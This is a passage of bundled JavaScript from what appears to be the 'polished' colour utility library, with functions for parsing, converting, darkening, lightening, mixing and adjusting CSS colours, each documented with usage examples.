var rgbaRegex = /^rgba\(\s*(\d{1,3})\s*,\s*(\d{1,3})\s*,\s*(\d{1,3})\s*,\s*([-+]?[0-9]*[.]?[0-9]+)\s*\)$/;
var hslRegex = /^hsl\(\s*(\d{0,3}[.]?[0-9]+)\s*,\s*(\d{1,3})%\s*,\s*(\d{1,3})%\s*\)$/;
var hslaRegex = /^hsla\(\s*(\d{0,3}[.]?[0-9]+)\s*,\s*(\d{1,3})%\s*,\s*(\d{1,3})%\s*,\s*([-+]?[0-9]*[.]?[0-9]+)\s*\)$/;
/**
 * Returns an RgbColor or RgbaColor object. This utility function is only useful
 * if want to extract a color component. With the color util `toColorString` you
 * can convert a RgbColor or RgbaColor object back to a string.
 *
 * @example
 * // Assigns `{ red: 255, green: 0, blue: 0 }` to color1
 * const color1 = parseToRgb('rgb(255, 0, 0)');
 * // Assigns `{ red: 92, green: 102, blue: 112, alpha: 0.75 }` to color2
 * const color2 = parseToRgb('hsla(210, 10%, 40%, 0.75)');
 */

function parseToRgb(color) {
  if (typeof color !== 'string') {
    throw new Error('Passed an incorrect argument to a color function, please pass a string representation of a color.');
  }

  var normalizedColor = nameToHex(color);

  if (normalizedColor.match(hexRegex)) {
    return {
      red: parseInt("" + normalizedColor[1] + normalizedColor[2], 16),
      green: parseInt("" + normalizedColor[3] + normalizedColor[4], 16),
      blue: parseInt("" + normalizedColor[5] + normalizedColor[6], 16)
    };
  }

  if (normalizedColor.match(hexRgbaRegex)) {
    var alpha = parseFloat((parseInt("" + normalizedColor[7] + normalizedColor[8], 16) / 255).toFixed(2));
    return {
      red: parseInt("" + normalizedColor[1] + normalizedColor[2], 16),
      green: parseInt("" + normalizedColor[3] + normalizedColor[4], 16),
      blue: parseInt("" + normalizedColor[5] + normalizedColor[6], 16),
      alpha: alpha
    };
  }

  if (normalizedColor.match(reducedHexRegex)) {
    return {
      red: parseInt("" + normalizedColor[1] + normalizedColor[1], 16),
      green: parseInt("" + normalizedColor[2] + normalizedColor[2], 16),
      blue: parseInt("" + normalizedColor[3] + normalizedColor[3], 16)
    };
  }

  if (normalizedColor.match(reducedRgbaHexRegex)) {
    var _alpha = parseFloat((parseInt("" + normalizedColor[4] + normalizedColor[4], 16) / 255).toFixed(2));

    return {
      red: parseInt("" + normalizedColor[1] + normalizedColor[1], 16),
      green: parseInt("" + normalizedColor[2] + normalizedColor[2], 16),
      blue: parseInt("" + normalizedColor[3] + normalizedColor[3], 16),
      alpha: _alpha
    };
  }

  var rgbMatched = rgbRegex.exec(normalizedColor);

  if (rgbMatched) {
    return {
      red: parseInt("" + rgbMatched[1], 10),
      green: parseInt("" + rgbMatched[2], 10),
      blue: parseInt("" + rgbMatched[3], 10)
    };
  }

  var rgbaMatched = rgbaRegex.exec(normalizedColor);

  if (rgbaMatched) {
    return {
      red: parseInt("" + rgbaMatched[1], 10),
      green: parseInt("" + rgbaMatched[2], 10),
      blue: parseInt("" + rgbaMatched[3], 10),
      alpha: parseFloat("" + rgbaMatched[4])
    };
  }

  var hslMatched = hslRegex.exec(normalizedColor);

  if (hslMatched) {
    var hue = parseInt("" + hslMatched[1], 10);
    var saturation = parseInt("" + hslMatched[2], 10) / 100;
    var lightness = parseInt("" + hslMatched[3], 10) / 100;
    var rgbColorString = "rgb(" + hslToRgb(hue, saturation, lightness) + ")";
    var hslRgbMatched = rgbRegex.exec(rgbColorString);

    if (!hslRgbMatched) {
      throw new Error("Couldn't generate valid rgb string from " + normalizedColor + ", it returned " + rgbColorString + ".");
    }

    return {
      red: parseInt("" + hslRgbMatched[1], 10),
      green: parseInt("" + hslRgbMatched[2], 10),
      blue: parseInt("" + hslRgbMatched[3], 10)
    };
  }

  var hslaMatched = hslaRegex.exec(normalizedColor);

  if (hslaMatched) {
    var _hue = parseInt("" + hslaMatched[1], 10);

    var _saturation = parseInt("" + hslaMatched[2], 10) / 100;

    var _lightness = parseInt("" + hslaMatched[3], 10) / 100;

    var _rgbColorString = "rgb(" + hslToRgb(_hue, _saturation, _lightness) + ")";

    var _hslRgbMatched = rgbRegex.exec(_rgbColorString);

    if (!_hslRgbMatched) {
      throw new Error("Couldn't generate valid rgb string from " + normalizedColor + ", it returned " + _rgbColorString + ".");
    }

    return {
      red: parseInt("" + _hslRgbMatched[1], 10),
      green: parseInt("" + _hslRgbMatched[2], 10),
      blue: parseInt("" + _hslRgbMatched[3], 10),
      alpha: parseFloat("" + hslaMatched[4])
    };
  }

  throw new Error("Couldn't parse the color string. Please provide the color as a string in hex, rgb, rgba, hsl or hsla notation.");
}

function rgbToHsl(color) {
  // make sure rgb are contained in a set of [0, 255]
  var red = color.red / 255;
  var green = color.green / 255;
  var blue = color.blue / 255;
  var max = Math.max(red, green, blue);
  var min = Math.min(red, green, blue);
  var lightness = (max + min) / 2;

  if (max === min) {
    // achromatic
    if (color.alpha !== undefined) {
      return {
        hue: 0,
        saturation: 0,
        lightness: lightness,
        alpha: color.alpha
      };
    } else {
      return {
        hue: 0,
        saturation: 0,
        lightness: lightness
      };
    }
  }

  var hue;
  var delta = max - min;
  var saturation = lightness > 0.5 ? delta / (2 - max - min) : delta / (max + min);

  switch (max) {
    case red:
      hue = (green - blue) / delta + (green < blue ? 6 : 0);
      break;

    case green:
      hue = (blue - red) / delta + 2;
      break;

    default:
      // blue case
      hue = (red - green) / delta + 4;
      break;
  }

  hue *= 60;

  if (color.alpha !== undefined) {
    return {
      hue: hue,
      saturation: saturation,
      lightness: lightness,
      alpha: color.alpha
    };
  }

  return {
    hue: hue,
    saturation: saturation,
    lightness: lightness
  };
}

/**
 * Returns an HslColor or HslaColor object. This utility function is only useful
 * if want to extract a color component. With the color util `toColorString` you
 * can convert a HslColor or HslaColor object back to a string.
 *
 * @example
 * // Assigns `{ hue: 0, saturation: 1, lightness: 0.5 }` to color1
 * const color1 = parseToHsl('rgb(255, 0, 0)');
 * // Assigns `{ hue: 128, saturation: 1, lightness: 0.5, alpha: 0.75 }` to color2
 * const color2 = parseToHsl('hsla(128, 100%, 50%, 0.75)');
 */
function parseToHsl(color) {
  // Note: At a later stage we can optimize this function as right now a hsl
  // color would be parsed converted to rgb values and converted back to hsl.
  return rgbToHsl(parseToRgb(color));
}

/**
 * Reduces hex values if possible e.g. #ff8866 to #f86
 * @private
 */
var reduceHexValue = function reduceHexValue(value) {
  if (value.length === 7 && value[1] === value[2] && value[3] === value[4] && value[5] === value[6]) {
    return "#" + value[1] + value[3] + value[5];
  }

  return value;
};

function numberToHex(value) {
  var hex = value.toString(16);
  return hex.length === 1 ? "0" + hex : hex;
}

function colorToHex(color) {
  return numberToHex(Math.round(color * 255));
}

function convertToHex(red, green, blue) {
  return reduceHexValue("#" + colorToHex(red) + colorToHex(green) + colorToHex(blue));
}

function hslToHex(hue, saturation, lightness) {
  return hslToRgb(hue, saturation, lightness, convertToHex);
}

/**
 * Returns a string value for the color. The returned result is the smallest possible hex notation.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   background: hsl(359, 0.75, 0.4),
 *   background: hsl({ hue: 360, saturation: 0.75, lightness: 0.4 }),
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   background: ${hsl(359, 0.75, 0.4)};
 *   background: ${hsl({ hue: 360, saturation: 0.75, lightness: 0.4 })};
 * `
 *
 * // CSS in JS Output
 *
 * element {
 *   background: "#b3191c";
 *   background: "#b3191c";
 * }
 */
function hsl(value, saturation, lightness) {
  if (typeof value === 'number' && typeof saturation === 'number' && typeof lightness === 'number') {
    return hslToHex(value, saturation, lightness);
  } else if (typeof value === 'object' && saturation === undefined && lightness === undefined) {
    return hslToHex(value.hue, value.saturation, value.lightness);
  }

  throw new Error('Passed invalid arguments to hsl, please pass multiple numbers e.g. hsl(360, 0.75, 0.4) or an object e.g. rgb({ hue: 255, saturation: 0.4, lightness: 0.75 }).');
}

/**
 * Returns a string value for the color. The returned result is the smallest possible rgba or hex notation.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   background: hsla(359, 0.75, 0.4, 0.7),
 *   background: hsla({ hue: 360, saturation: 0.75, lightness: 0.4, alpha: 0,7 }),
 *   background: hsla(359, 0.75, 0.4, 1),
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   background: ${hsla(359, 0.75, 0.4, 0.7)};
 *   background: ${hsla({ hue: 360, saturation: 0.75, lightness: 0.4, alpha: 0,7 })};
 *   background: ${hsla(359, 0.75, 0.4, 1)};
 * `
 *
 * // CSS in JS Output
 *
 * element {
 *   background: "rgba(179,25,28,0.7)";
 *   background: "rgba(179,25,28,0.7)";
 *   background: "#b3191c";
 * }
 */
function hsla(value, saturation, lightness, alpha) {
  if (typeof value === 'number' && typeof saturation === 'number' && typeof lightness === 'number' && typeof alpha === 'number') {
    return alpha >= 1 ? hslToHex(value, saturation, lightness) : "rgba(" + hslToRgb(value, saturation, lightness) + "," + alpha + ")";
  } else if (typeof value === 'object' && saturation === undefined && lightness === undefined && alpha === undefined) {
    return value.alpha >= 1 ? hslToHex(value.hue, value.saturation, value.lightness) : "rgba(" + hslToRgb(value.hue, value.saturation, value.lightness) + "," + value.alpha + ")";
  }

  throw new Error('Passed invalid arguments to hsla, please pass multiple numbers e.g. hsl(360, 0.75, 0.4, 0.7) or an object e.g. rgb({ hue: 255, saturation: 0.4, lightness: 0.75, alpha: 0.7 }).');
}

/**
 * Returns a string value for the color. The returned result is the smallest possible hex notation.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   background: rgb(255, 205, 100),
 *   background: rgb({ red: 255, green: 205, blue: 100 }),
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   background: ${rgb(255, 205, 100)};
 *   background: ${rgb({ red: 255, green: 205, blue: 100 })};
 * `
 *
 * // CSS in JS Output
 *
 * element {
 *   background: "#ffcd64";
 *   background: "#ffcd64";
 * }
 */
function rgb(value, green, blue) {
  if (typeof value === 'number' && typeof green === 'number' && typeof blue === 'number') {
    return reduceHexValue("#" + numberToHex(value) + numberToHex(green) + numberToHex(blue));
  } else if (typeof value === 'object' && green === undefined && blue === undefined) {
    return reduceHexValue("#" + numberToHex(value.red) + numberToHex(value.green) + numberToHex(value.blue));
  }

  throw new Error('Passed invalid arguments to rgb, please pass multiple numbers e.g. rgb(255, 205, 100) or an object e.g. rgb({ red: 255, green: 205, blue: 100 }).');
}

/**
 * Returns a string value for the color. The returned result is the smallest possible rgba or hex notation.
 *
 * Can also be used to fade a color by passing a hex value or named CSS color along with an alpha value.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   background: rgba(255, 205, 100, 0.7),
 *   background: rgba({ red: 255, green: 205, blue: 100, alpha: 0.7 }),
 *   background: rgba(255, 205, 100, 1),
 *   background: rgba('#ffffff', 0.4),
 *   background: rgba('black', 0.7),
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   background: ${rgba(255, 205, 100, 0.7)};
 *   background: ${rgba({ red: 255, green: 205, blue: 100, alpha: 0.7 })};
 *   background: ${rgba(255, 205, 100, 1)};
 *   background: ${rgba('#ffffff', 0.4)};
 *   background: ${rgba('black', 0.7)};
 * `
 *
 * // CSS in JS Output
 *
 * element {
 *   background: "rgba(255,205,100,0.7)";
 *   background: "rgba(255,205,100,0.7)";
 *   background: "#ffcd64";
 *   background: "rgba(255,255,255,0.4)";
 *   background: "rgba(0,0,0,0.7)";
 * }
 */
function rgba(firstValue, secondValue, thirdValue, fourthValue) {
  if (typeof firstValue === 'string' && typeof secondValue === 'number') {
    var rgbValue = parseToRgb(firstValue);
    return "rgba(" + rgbValue.red + "," + rgbValue.green + "," + rgbValue.blue + "," + secondValue + ")";
  } else if (typeof firstValue === 'number' && typeof secondValue === 'number' && typeof thirdValue === 'number' && typeof fourthValue === 'number') {
    return fourthValue >= 1 ? rgb(firstValue, secondValue, thirdValue) : "rgba(" + firstValue + "," + secondValue + "," + thirdValue + "," + fourthValue + ")";
  } else if (typeof firstValue === 'object' && secondValue === undefined && thirdValue === undefined && fourthValue === undefined) {
    return firstValue.alpha >= 1 ? rgb(firstValue.red, firstValue.green, firstValue.blue) : "rgba(" + firstValue.red + "," + firstValue.green + "," + firstValue.blue + "," + firstValue.alpha + ")";
  }

  throw new Error('Passed invalid arguments to rgba, please pass multiple numbers e.g. rgb(255, 205, 100, 0.75) or an object e.g. rgb({ red: 255, green: 205, blue: 100, alpha: 0.75 }).');
}

var isRgb = function isRgb(color) {
  return typeof color.red === 'number' && typeof color.green === 'number' && typeof color.blue === 'number' && (typeof color.alpha !== 'number' || typeof color.alpha === 'undefined');
};

var isRgba = function isRgba(color) {
  return typeof color.red === 'number' && typeof color.green === 'number' && typeof color.blue === 'number' && typeof color.alpha === 'number';
};

var isHsl = function isHsl(color) {
  return typeof color.hue === 'number' && typeof color.saturation === 'number' && typeof color.lightness === 'number' && (typeof color.alpha !== 'number' || typeof color.alpha === 'undefined');
};

var isHsla = function isHsla(color) {
  return typeof color.hue === 'number' && typeof color.saturation === 'number' && typeof color.lightness === 'number' && typeof color.alpha === 'number';
};

var errMsg = 'Passed invalid argument to toColorString, please pass a RgbColor, RgbaColor, HslColor or HslaColor object.';
/**
 * Converts a RgbColor, RgbaColor, HslColor or HslaColor object to a color string.
 * This util is useful in case you only know on runtime which color object is
 * used. Otherwise we recommend to rely on `rgb`, `rgba`, `hsl` or `hsla`.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   background: toColorString({ red: 255, green: 205, blue: 100 }),
 *   background: toColorString({ red: 255, green: 205, blue: 100, alpha: 0.72 }),
 *   background: toColorString({ hue: 240, saturation: 1, lightness: 0.5 }),
 *   background: toColorString({ hue: 360, saturation: 0.75, lightness: 0.4, alpha: 0.72 }),
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   background: ${toColorString({ red: 255, green: 205, blue: 100 })};
 *   background: ${toColorString({ red: 255, green: 205, blue: 100, alpha: 0.72 })};
 *   background: ${toColorString({ hue: 240, saturation: 1, lightness: 0.5 })};
 *   background: ${toColorString({ hue: 360, saturation: 0.75, lightness: 0.4, alpha: 0.72 })};
 * `
 *
 * // CSS in JS Output
 * element {
 *   background: "#ffcd64";
 *   background: "rgba(255,205,100,0.72)";
 *   background: "#00f";
 *   background: "rgba(179,25,25,0.72)";
 * }
 */

function toColorString(color) {
  if (typeof color !== 'object') throw new Error(errMsg);
  if (isRgba(color)) return rgba(color);
  if (isRgb(color)) return rgb(color);
  if (isHsla(color)) return hsla(color);
  if (isHsl(color)) return hsl(color);
  throw new Error(errMsg);
}

// Type definitions taken from https://github.com/gcanti/flow-static-land/blob/master/src/Fun.js
// eslint-disable-next-line no-unused-vars
// eslint-disable-next-line no-unused-vars
// eslint-disable-next-line no-redeclare
function curried(f, length, acc) {
  return function fn() {
    // eslint-disable-next-line prefer-rest-params
    var combined = acc.concat(Array.prototype.slice.call(arguments));
    return combined.length >= length ? f.apply(this, combined) : curried(f, length, combined);
  };
} // eslint-disable-next-line no-redeclare


function curry(f) {
  // eslint-disable-line no-redeclare
  return curried(f, f.length, []);
}

/**
 * Changes the hue of the color. Hue is a number between 0 to 360. The first
 * argument for adjustHue is the amount of degrees the color is rotated along
 * the color wheel.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   background: adjustHue(180, '#448'),
 *   background: adjustHue('180', 'rgba(101,100,205,0.7)'),
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   background: ${adjustHue(180, '#448')};
 *   background: ${adjustHue('180', 'rgba(101,100,205,0.7)')};
 * `
 *
 * // CSS in JS Output
 * element {
 *   background: "#888844";
 *   background: "rgba(136,136,68,0.7)";
 * }
 */

function adjustHue(degree, color) {
  var hslColor = parseToHsl(color);
  return toColorString(Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, hslColor, {
    hue: (hslColor.hue + parseFloat(degree)) % 360
  }));
} // prettier-ignore


var curriedAdjustHue =
/*#__PURE__*/
curry
/* ::<number | string, string, string> */
(adjustHue);

/**
 * Returns the complement of the provided color. This is identical to adjustHue(180, <color>).
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   background: complement('#448'),
 *   background: complement('rgba(204,205,100,0.7)'),
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   background: ${complement('#448')};
 *   background: ${complement('rgba(204,205,100,0.7)')};
 * `
 *
 * // CSS in JS Output
 * element {
 *   background: "#884";
 *   background: "rgba(153,153,153,0.7)";
 * }
 */

function complement(color) {
  var hslColor = parseToHsl(color);
  return toColorString(Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, hslColor, {
    hue: (hslColor.hue + 180) % 360
  }));
}

function guard(lowerBoundary, upperBoundary, value) {
  return Math.max(lowerBoundary, Math.min(upperBoundary, value));
}

/**
 * Returns a string value for the darkened color.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   background: darken(0.2, '#FFCD64'),
 *   background: darken('0.2', 'rgba(255,205,100,0.7)'),
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   background: ${darken(0.2, '#FFCD64')};
 *   background: ${darken('0.2', 'rgba(255,205,100,0.7)')};
 * `
 *
 * // CSS in JS Output
 *
 * element {
 *   background: "#ffbd31";
 *   background: "rgba(255,189,49,0.7)";
 * }
 */

function darken(amount, color) {
  var hslColor = parseToHsl(color);
  return toColorString(Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, hslColor, {
    lightness: guard(0, 1, hslColor.lightness - parseFloat(amount))
  }));
} // prettier-ignore


var curriedDarken =
/*#__PURE__*/
curry
/* ::<number | string, string, string> */
(darken);

/**
 * Decreases the intensity of a color. Its range is between 0 to 1. The first
 * argument of the desaturate function is the amount by how much the color
 * intensity should be decreased.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   background: desaturate(0.2, '#CCCD64'),
 *   background: desaturate('0.2', 'rgba(204,205,100,0.7)'),
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   background: ${desaturate(0.2, '#CCCD64')};
 *   background: ${desaturate('0.2', 'rgba(204,205,100,0.7)')};
 * `
 *
 * // CSS in JS Output
 * element {
 *   background: "#b8b979";
 *   background: "rgba(184,185,121,0.7)";
 * }
 */

function desaturate(amount, color) {
  var hslColor = parseToHsl(color);
  return toColorString(Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, hslColor, {
    saturation: guard(0, 1, hslColor.saturation - parseFloat(amount))
  }));
} // prettier-ignore


var curriedDesaturate =
/*#__PURE__*/
curry
/* ::<number | string, string, string> */
(desaturate);

/**
 * Returns a number (float) representing the luminance of a color.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   background: getLuminance('#CCCD64') >= getLuminance('#0000ff') ? '#CCCD64' : '#0000ff',
 *   background: getLuminance('rgba(58, 133, 255, 1)') >= getLuminance('rgba(255, 57, 149, 1)') ?
 *                             'rgba(58, 133, 255, 1)' :
 *                             'rgba(255, 57, 149, 1)',
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   background: ${getLuminance('#CCCD64') >= getLuminance('#0000ff') ? '#CCCD64' : '#0000ff'};
 *   background: ${getLuminance('rgba(58, 133, 255, 1)') >= getLuminance('rgba(255, 57, 149, 1)') ?
 *                             'rgba(58, 133, 255, 1)' :
 *                             'rgba(255, 57, 149, 1)'};
 *
 * // CSS in JS Output
 *
 * div {
 *   background: "#CCCD64";
 *   background: "rgba(58, 133, 255, 1)";
 * }
 */

function getLuminance(color) {
  var rgbColor = parseToRgb(color);

  var _Object$keys$map = Object.keys(rgbColor).map(function (key) {
    var channel = rgbColor[key] / 255;
    return channel <= 0.03928 ? channel / 12.92 : Math.pow((channel + 0.055) / 1.055, 2.4);
  }),
      r = _Object$keys$map[0],
      g = _Object$keys$map[1],
      b = _Object$keys$map[2];

  return parseFloat((0.2126 * r + 0.7152 * g + 0.0722 * b).toFixed(3));
}

/**
 * Converts the color to a grayscale, by reducing its saturation to 0.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   background: grayscale('#CCCD64'),
 *   background: grayscale('rgba(204,205,100,0.7)'),
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   background: ${grayscale('#CCCD64')};
 *   background: ${grayscale('rgba(204,205,100,0.7)')};
 * `
 *
 * // CSS in JS Output
 * element {
 *   background: "#999";
 *   background: "rgba(153,153,153,0.7)";
 * }
 */

function grayscale(color) {
  return toColorString(Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, parseToHsl(color), {
    saturation: 0
  }));
}

/**
 * Inverts the red, green and blue values of a color.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   background: invert('#CCCD64'),
 *   background: invert('rgba(101,100,205,0.7)'),
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   background: ${invert('#CCCD64')};
 *   background: ${invert('rgba(101,100,205,0.7)')};
 * `
 *
 * // CSS in JS Output
 *
 * element {
 *   background: "#33329b";
 *   background: "rgba(154,155,50,0.7)";
 * }
 */

function invert(color) {
  // parse color string to rgb
  var value = parseToRgb(color);
  return toColorString(Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, value, {
    red: 255 - value.red,
    green: 255 - value.green,
    blue: 255 - value.blue
  }));
}

/**
 * Returns a string value for the lightened color.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   background: lighten(0.2, '#CCCD64'),
 *   background: lighten('0.2', 'rgba(204,205,100,0.7)'),
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   background: ${lighten(0.2, '#FFCD64')};
 *   background: ${lighten('0.2', 'rgba(204,205,100,0.7)')};
 * `
 *
 * // CSS in JS Output
 *
 * element {
 *   background: "#e5e6b1";
 *   background: "rgba(229,230,177,0.7)";
 * }
 */

function lighten(amount, color) {
  var hslColor = parseToHsl(color);
  return toColorString(Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, hslColor, {
    lightness: guard(0, 1, hslColor.lightness + parseFloat(amount))
  }));
} // prettier-ignore


var curriedLighten =
/*#__PURE__*/
curry
/* ::<number | string, string, string> */
(lighten);

/**
 * Mixes the two provided colors together by calculating the average of each of the RGB components weighted to the first color by the provided weight.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   background: mix(0.5, '#f00', '#00f')
 *   background: mix(0.25, '#f00', '#00f')
 *   background: mix('0.5', 'rgba(255, 0, 0, 0.5)', '#00f')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   background: ${mix(0.5, '#f00', '#00f')};
 *   background: ${mix(0.25, '#f00', '#00f')};
 *   background: ${mix('0.5', 'rgba(255, 0, 0, 0.5)', '#00f')};
 * `
 *
 * // CSS in JS Output
 *
 * element {
 *   background: "#7f007f";
 *   background: "#3f00bf";
 *   background: "rgba(63, 0, 191, 0.75)";
 * }
 */

function mix(weight, color, otherColor) {
  var parsedColor1 = parseToRgb(color);

  var color1 = Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, parsedColor1, {
    alpha: typeof parsedColor1.alpha === 'number' ? parsedColor1.alpha : 1
  });

  var parsedColor2 = parseToRgb(otherColor);

  var color2 = Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, parsedColor2, {
    alpha: typeof parsedColor2.alpha === 'number' ? parsedColor2.alpha : 1 // The formular is copied from the original Sass implementation:
    // http://sass-lang.com/documentation/Sass/Script/Functions.html#mix-instance_method

  });

  var alphaDelta = color1.alpha - color2.alpha;
  var x = parseFloat(weight) * 2 - 1;
  var y = x * alphaDelta === -1 ? x : x + alphaDelta;
  var z = 1 + x * alphaDelta;
  var weight1 = (y / z + 1) / 2.0;
  var weight2 = 1 - weight1;
  var mixedColor = {
    red: Math.floor(color1.red * weight1 + color2.red * weight2),
    green: Math.floor(color1.green * weight1 + color2.green * weight2),
    blue: Math.floor(color1.blue * weight1 + color2.blue * weight2),
    alpha: color1.alpha + (color2.alpha - color1.alpha) * (parseFloat(weight) / 1.0)
  };
  return rgba(mixedColor);
} // prettier-ignore


var curriedMix =
/*#__PURE__*/
curry
/* ::<number | string, string, string, string> */
(mix);

/**
 * Increases the opacity of a color. Its range for the amount is between 0 to 1.
 *
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   background: opacify(0.1, 'rgba(255, 255, 255, 0.9)');
 *   background: opacify(0.2, 'hsla(0, 0%, 100%, 0.5)'),
 *   background: opacify('0.5', 'rgba(255, 0, 0, 0.2)'),
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   background: ${opacify(0.1, 'rgba(255, 255, 255, 0.9)')};
 *   background: ${opacify(0.2, 'hsla(0, 0%, 100%, 0.5)')},
 *   background: ${opacify('0.5', 'rgba(255, 0, 0, 0.2)')},
 * `
 *
 * // CSS in JS Output
 *
 * element {
 *   background: "#fff";
 *   background: "rgba(255,255,255,0.7)";
 *   background: "rgba(255,0,0,0.7)";
 * }
 */

function opacify(amount, color) {
  var parsedColor = parseToRgb(color);
  var alpha = typeof parsedColor.alpha === 'number' ? parsedColor.alpha : 1;

  var colorWithAlpha = Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, parsedColor, {
    alpha: guard(0, 1, (alpha * 100 + parseFloat(amount) * 100) / 100)
  });

  return rgba(colorWithAlpha);
} // prettier-ignore


var curriedOpacify =
/*#__PURE__*/
curry
/* ::<number | string, string, string> */
(opacify);

/**
 * Returns black or white for best contrast depending on the luminosity of the given color.
 * Follows W3C specs for readability at https://www.w3.org/TR/WCAG20-TECHS/G18.html
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   color: readableColor('#000'),
 *   color: readableColor('papayawhip'),
 *   color: readableColor('rgb(255,0,0)'),
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   color: ${readableColor('#000')};
 *   color: ${readableColor('papayawhip')};
 *   color: ${readableColor('rgb(255,0,0)')};
 * `
 *
 * // CSS in JS Output
 *
 * element {
 *   color: "#fff";
 *   color: "#fff";
 *   color: "#000";
 * }
 */

function readableColor(color) {
  return getLuminance(color) > 0.179 ? '#000' : '#fff';
}

/**
 * Increases the intensity of a color. Its range is between 0 to 1. The first
 * argument of the saturate function is the amount by how much the color
 * intensity should be increased.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   background: saturate(0.2, '#CCCD64'),
 *   background: saturate('0.2', 'rgba(204,205,100,0.7)'),
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   background: ${saturate(0.2, '#FFCD64')};
 *   background: ${saturate('0.2', 'rgba(204,205,100,0.7)')};
 * `
 *
 * // CSS in JS Output
 *
 * element {
 *   background: "#e0e250";
 *   background: "rgba(224,226,80,0.7)";
 * }
 */

function saturate(amount, color) {
  var hslColor = parseToHsl(color);
  return toColorString(Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, hslColor, {
    saturation: guard(0, 1, hslColor.saturation + parseFloat(amount))
  }));
} // prettier-ignore


var curriedSaturate =
/*#__PURE__*/
curry
/* ::<number | string, string, string> */
(saturate);

/**
 * Sets the hue of a color to the provided value. The hue range can be
 * from 0 and 359.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   background: setHue(42, '#CCCD64'),
 *   background: setHue('244', 'rgba(204,205,100,0.7)'),
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   background: ${setHue(42, '#CCCD64')};
 *   background: ${setHue('244', 'rgba(204,205,100,0.7)')};
 * `
 *
 * // CSS in JS Output
 * element {
 *   background: "#cdae64";
 *   background: "rgba(107,100,205,0.7)";
 * }
 */

function setHue(hue, color) {
  return toColorString(Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, parseToHsl(color), {
    hue: parseFloat(hue)
  }));
} // prettier-ignore


var curriedSetHue =
/*#__PURE__*/
curry
/* ::<number | string, string, string> */
(setHue);

/**
 * Sets the lightness of a color to the provided value. The lightness range can be
 * from 0 and 1.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   background: setLightness(0.2, '#CCCD64'),
 *   background: setLightness('0.75', 'rgba(204,205,100,0.7)'),
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   background: ${setLightness(0.2, '#CCCD64')};
 *   background: ${setLightness('0.75', 'rgba(204,205,100,0.7)')};
 * `
 *
 * // CSS in JS Output
 * element {
 *   background: "#4d4d19";
 *   background: "rgba(223,224,159,0.7)";
 * }
 */

function setLightness(lightness, color) {
  return toColorString(Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, parseToHsl(color), {
    lightness: parseFloat(lightness)
  }));
} // prettier-ignore


var curriedSetLightness =
/*#__PURE__*/
curry
/* ::<number | string, string, string> */
(setLightness);

/**
 * Sets the saturation of a color to the provided value. The lightness range can be
 * from 0 and 1.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   background: setSaturation(0.2, '#CCCD64'),
 *   background: setSaturation('0.75', 'rgba(204,205,100,0.7)'),
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   background: ${setSaturation(0.2, '#CCCD64')};
 *   background: ${setSaturation('0.75', 'rgba(204,205,100,0.7)')};
 * `
 *
 * // CSS in JS Output
 * element {
 *   background: "#adad84";
 *   background: "rgba(228,229,76,0.7)";
 * }
 */

function setSaturation(saturation, color) {
  return toColorString(Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__["a" /* default */])({}, parseToHsl(color), {
    saturation: parseFloat(saturation)
